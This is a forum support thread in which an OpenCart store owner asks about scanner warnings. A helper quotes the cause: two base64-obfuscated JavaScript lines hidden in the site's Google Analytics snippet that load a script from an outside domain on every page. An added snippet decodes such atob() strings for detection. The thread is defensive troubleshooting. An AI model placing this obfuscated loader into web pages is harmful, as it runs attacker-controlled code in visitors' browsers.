
Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 8:40 pm
by rhorne
We run an online store, here: https://tinyurl.com/yxv2z9p4

Whenever I've done malware scans or error checking it generally passes without issue, but occasionally I see mention of a possible injection attack. And it's always this same js file: https://www.jctfinancial.com/wp-content ... plugins.js

See the below scan results for confirmation:

https://rescan.pro/result.php?5c246c4ba ... dc0e071ed3

I've tried browsing the site in Firefox using debug mode and it too shows a warning against this. However, I can't find which of the files on my site contains any links to this. I've done a search on the contents of a full backup of the site and can't find any files containing that URL and I can't see how in Firefox it's possible to determine where that link is coming from.

If anyone can shed any light I'd be very grateful.

Opencart 2.3.0.2. Journal 2 template.

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 9:13 pm
by IP_CAM
Well, this topic seems to have been cleared out already, but that's what it takes
for Journal to make an OpenCart Software work. :crazy: :choke:
Image
---
But you also seem to use Wordpress on the same Site, and that makes it even more
dangerous. But I also recall an insecure Journal-2 Edition to be mentioned a while
ago, so better get a professional, because nobody else would be able or willing to
assist in such an installation.
Good Luck ...
Ernie

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 10:16 pm
by rhorne
I'm confused. Your screenshot doesn't give me any clues. Yes there are lots of JS files but none of them that I can see link to that website.

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 11:01 pm
by IP_CAM
Well, I just wanted to point out why so many don't like Journal Themes,
since that kind of Coding is far from the 'regular' way of 'handling' OC.
Still, your problem is not directly related to OC, it's a Wordpress Hack, as it
looks, doing bad things to your Site.
Ernie

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 11:31 pm
by rhorne
Thanks for the reply Ernie.

I don't use Wordpress on that domain so what is suggesting that I am?

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 11:46 pm
by ADD Creative
It's these two lines of code. It's decoding the URL and then adding the script to the page.

Code:

  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);

It appears in your Google Analytics code.

Code:

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-34406391-6"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);

  gtag('js', new Date());

  gtag('config', 'UA-34406391-6');
</script>

You need to remove the code and fix your Google Analytics code. I would also recommend you check if your theme has any updates that may have security patches. Also change all your passwords, such as all OpenCart admin logins, all hosting control panel logins, all FTP accounts, etc.
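
An added example, not part of any post in this thread: because the URL is stored base64-encoded inside an atob() call, a plain-text search of a backup for the domain finds nothing. This Node.js sketch decodes string literals passed to atob() in any text (a theme file, saved page source, or a database dump) and reports those that decode to a URL; the function names and the "hello world" line in the sample are constructed for illustration.

```javascript
// Added example (not from the thread): decode atob() literals and flag URLs.
// Works on any text: a theme file, saved page source, or a database dump.
const ATOB_CALL = /atob\(\s*(['"])([A-Za-z0-9+\/=]{8,})\1\s*\)/g;

// Decode a base64 literal; return null if it is not canonical base64
// (Buffer.from silently skips invalid characters, so re-encode and compare).
function decodeBase64(literal) {
  const buf = Buffer.from(literal, 'base64');
  const strip = (s) => s.replace(/=+$/, '');
  return strip(buf.toString('base64')) === strip(literal) ? buf.toString('utf8') : null;
}

// Return one finding per atob() literal that decodes to an absolute or
// protocol-relative URL, with the 1-based line number where it occurs.
function findEncodedUrls(text) {
  const findings = [];
  for (const m of text.matchAll(ATOB_CALL)) {
    const decoded = decodeBase64(m[2]);
    if (decoded !== null && /^(https?:)?\/\//i.test(decoded)) {
      const line = text.slice(0, m.index).split('\n').length;
      findings.push({ line, encoded: m[2], decoded });
    }
  }
  return findings;
}

// Sample input: the two injected lines quoted in the post above, plus one
// constructed harmless atob() call that must not be reported.
const sample = `<script>
  var greeting = atob('aGVsbG8gd29ybGQ=');
  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);
</script>`;

for (const f of findEncodedUrls(sample)) {
  console.log(`line ${f.line}: atob literal decodes to ${f.decoded}`);
}
```

Searching for the string `atob(` alone also works as a first pass; decoding narrows the hits to literals that actually hide a URL.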

Re: Potential malware or injected script on my site

Posted: Thu Aug 08, 2019 11:49 pm
by Elevate
rhorne wrote:
Thu Aug 08, 2019 11:31 pm
Thanks for the reply Ernie.

I don't use Wordpress on that domain so what is suggesting that I am?
Even though you're not running a Wordpress site, this implies that there are still WP files uploaded to the server. Is that the case? Hackers don't care whether or not you're actually running a WP site. They just want to find files and hack them so the malicious code gets executed and spread around.

Re: Potential malware or injected script on my site

Posted: Fri Aug 09, 2019 2:42 am
by IP_CAM
Hackers don't care whether or not you're actually running a WP site.
That's correct! And hacking Attempts on OC Sites are not uncommon; I frequently
redirect such Calls by use of a fine 1.5.x Extension, as you can see on the image below. :D
Ernie
---
Image

Re: Potential malware or injected script on my site

Posted: Fri Aug 09, 2019 3:24 pm
by rhorne
Thanks for your replies guys. I'll update the Google Analytics code and themes etc and change all passwords immediately. :)

Re: Potential malware or injected script on my site

Posted: Fri Aug 09, 2019 4:02 pm
by wrick0
Make sure your host has ModSecurity installed, which can block most of the SQL attacks.